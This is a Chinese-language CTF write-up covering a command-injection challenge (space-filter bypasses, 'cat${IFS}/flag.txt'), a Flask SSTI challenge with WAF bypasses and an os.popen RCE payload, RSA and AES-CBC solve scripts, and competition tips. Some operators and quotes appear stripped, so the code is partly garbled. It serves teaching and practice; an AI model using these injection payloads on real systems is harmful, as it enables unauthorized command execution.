从实战到复盘：一次CTF竞赛中的Web渗透与密码学解题思路解析

1. CTF竞赛中的Web渗透实战解析去年参加浙江省大学生网络与信息安全竞赛时遇到一道典型的Web渗透题。题目页面只有一个简单的输入框提示输入不进去啦看似人畜无害的表单背后却暗藏杀机。这种场景在CTF中很常见——表面越简单的题目往往越考验选手的基础功底和思维发散能力。1.1 初探题目环境首先用浏览器开发者工具检查前端代码发现关键JavaScript逻辑function checkInput() { let userInput document.getElementById(cmd).value; if(userInput.includes( )) { alert(检测到空格字符); return false; } return true; }这段代码有两个重要信息一是输入内容会作为cmd参数提交二是前端过滤了空格字符。但前端验证永远只能防君子不能防小人我们完全可以用Burp Suite拦截修改请求。1.2 命令注入漏洞利用用Burp抓包后发现请求格式为POST /execute HTTP/1.1 ... cmdwhoami尝试注入命令分隔符cmdls||返回服务器错误说明可能存在命令注入。但空格被过滤了这时候需要绕过技巧用${IFS}代替空格cmdls${IFS}/用重定向符绕过cmdcatflag.txt用Tab键的URL编码cmdls%09/最终成功执行的payloadcmdcat${IFS}/flag.txt1.3 SSTI模板注入绕过另一道Web题涉及Python Flask的SSTI漏洞。题目页面显示SECRET_KEY None # TODO: Change before production尝试注入{{7*7}}返回49确认存在模板注入。但常规payload被WAF拦截需要绕过字符串拼接{{flag}}属性访问替代{{request[__class__]}}十六进制编码{{\x66\x6c\x61\x67}}最终获取flag的payload{{config.__class__.__init__.__globals__[os].popen(cat flag).read()}}2. 密码学赛题破解实录2.1 RSA参数恢复题目给出sum_pq 158707...3752 diff_pq 836877...3256 e 65537 c 241613...7070这是典型的RSA参数恢复题。根据数学关系p q sum_pq p - q diff_pq解题脚本p (sum_pq diff_pq) // 2 q (sum_pq - diff_pq) // 2 phi (p-1)*(q-1) d pow(e, -1, phi) m pow(c, d, p*q) print(bytes.fromhex(hex(m)[2:]))2.2 AES-CBC模式解密题目给出IV和密文iv_str 0123456789abcdef ciphertext_b64 H4vkfGfsUqBEwaa7ea9gBkR... password Cryptography解题关键在于密钥生成方式。观察代码发现使用MD5哈希的前16字节from Crypto.Cipher import AES from hashlib import md5 key md5(password.encode()).digest()[:16] cipher AES.new(key, AES.MODE_CBC, iv_str.encode()) plaintext cipher.decrypt(base64.b64decode(ciphertext_b64))注意点IV必须与加密时一致可能需要处理PKCS#7填充密文需要base64解码3. 实战经验与避坑指南3.1 时间管理策略5分钟原则如果5分钟没有思路先标记题目继续下一题三阶解题法第一阶段(1h)快速扫描所有题目第二阶段(2h)主攻有思路的题目第三阶段(1h)集中解决难题团队分工建议Web手主攻注入、SSTI、反序列化Crypto手专注RSA、AES、ECC等算法Reverse手分析二进制和混淆代码Misc手处理隐写、流量分析等杂项3.2 常见踩坑点Web方向忽略HTTP头注入点如User-Agent忘记测试JSON参数污染过度依赖自动化工具漏掉手动测试密码学方向混淆加密模式如CBC与ECB忽略padding oracle攻击可能错误处理大整数运算工具配置问题Python2/3环境混乱缺少必要的密码学库虚拟机网络配置错误4. 赛后复盘与提升建议4.1 解题方法论信息收集阶段完整保存所有题目文件记录所有网络请求和响应使用file命令检查文件类型漏洞利用阶段先验证漏洞存在性再构造稳定利用链最后实现自动化利用flag提交前检查flag格式如DASCTF{}验证flag有效性部分比赛有校验机制记录完整解题过程4.2 推荐训练资源在线靶场Hack The Box综合渗透Cryptohack密码学专项CTFlearn新手友好知识体系构建Web《白帽子讲Web安全》Crypto《深入浅出密码学》Reverse《逆向工程核心原理》工具链打磨开发自己的解题脚本库定制Burp Suite插件维护常用payload字典那次比赛我们团队最终获得二等奖最大的收获不是奖项而是认识到基础功的重要性。很多看似复杂的漏洞利用最终都回归到对HTTP协议、加密算法这些基础知识的深刻理解。建议新手从PHP代码审计、古典密码这些基础题型入手逐步构建完整的知识体系。